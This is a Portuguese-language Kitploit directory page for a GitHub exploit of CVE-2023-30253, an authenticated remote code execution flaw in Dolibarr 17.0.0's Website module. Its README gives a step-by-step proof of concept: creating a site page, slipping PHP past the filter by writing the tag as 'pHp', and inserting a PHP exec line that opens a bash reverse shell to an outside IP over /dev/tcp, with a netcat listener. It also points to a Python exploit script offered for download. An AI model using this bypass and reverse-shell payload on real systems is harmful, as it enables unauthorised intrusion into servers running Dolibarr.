Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Dolibarr-17.0.0-Exploit-CVE-2023-30253 — No Dolibarr 17.0.0 com o plugin CMS Website (core) habilitado, um atacante autenticado pode obter execução remota de comandos via injeção de código php, contornando as restrições da aplicação. | Kitploit
Ferramentas/GitHubGitHub/dollarboysushil/dolibarr-17.0.0-exploit-cve-2023-30253
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubdollarboysushil/dolibarr-17.0.0-exploit-cve-2023-30253

Dolibarr-17.0.0-Exploit-CVE-2023-30253

No Dolibarr 17.0.0 com o plugin CMS Website (core) habilitado, um atacante autenticado pode obter execução remota de comandos via injeção de código php, contornando as restrições da aplicação.

Ver Repositório
931há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Readme.md

CVE-2023-30253

A CVE-2023-30253 é uma falha de segurança no software Dolibarr que permite que usuários autenticados executem código remoto utilizando uma técnica de manipulação de maiúsculas em dados injetados.

Impacto

Esta vulnerabilidade pode levar à execução remota de código não autorizada por agentes maliciosos, representando uma grave ameaça à segurança e integridade dos sistemas afetados. A vulnerabilidade foi corrigida no Dolibarr 17.0.1.

Referência

https://www.swascan.com/security-advisory-dolibarr-17-0-0/

https://github.com/Dolibarr/dolibarr


Prova de Conceito

A POC a seguir mostra como obter um shell reverso manualmente.

Untitled.png

Após fazer login como usuário de teste, podemos criar/modificar o site.

Untitled (1).png

Primeiro crie um site e, em seguida, crie uma página.

Untitled (2).png

Untitled

Depois de criar o site e a página, clique no ícone de binóculos; isso abrirá nossa página criada em uma nova guia.

Agora clique em Editar HTML Source.

Untitled (4).png

Aqui podemos tentar adicionar código php, mas existe algum tipo de filtro que nos impede de escrever código php. Isso pode ser facilmente contornado alterando o formato da palavra php.

Untitled (5).png

Após alterar o formato da palavra php para pHp, podemos ver que foi salvo com sucesso.

Untitled (6).png

Indo para a página, podemos ver que nosso código php inserido está funcionando.

Agora, para obter o shell reverso, vamos configurar o ouvinte netcat.

Untitled (7).png

Untitled (8).png

Em seguida, adicione nosso código de shell reverso <?pHp exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.101/1010 0>&1'"); ?>

Agora abrindo o site, obtemos o shell reverso.

Untitled (9).png




Podemos usar o código python para facilitar.

Untitled

Configure o ouvinte netcat.

Untitled

Execute o script e devemos obter um shell reverso.

Untitled Autor do script: https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

Baixar ferramenta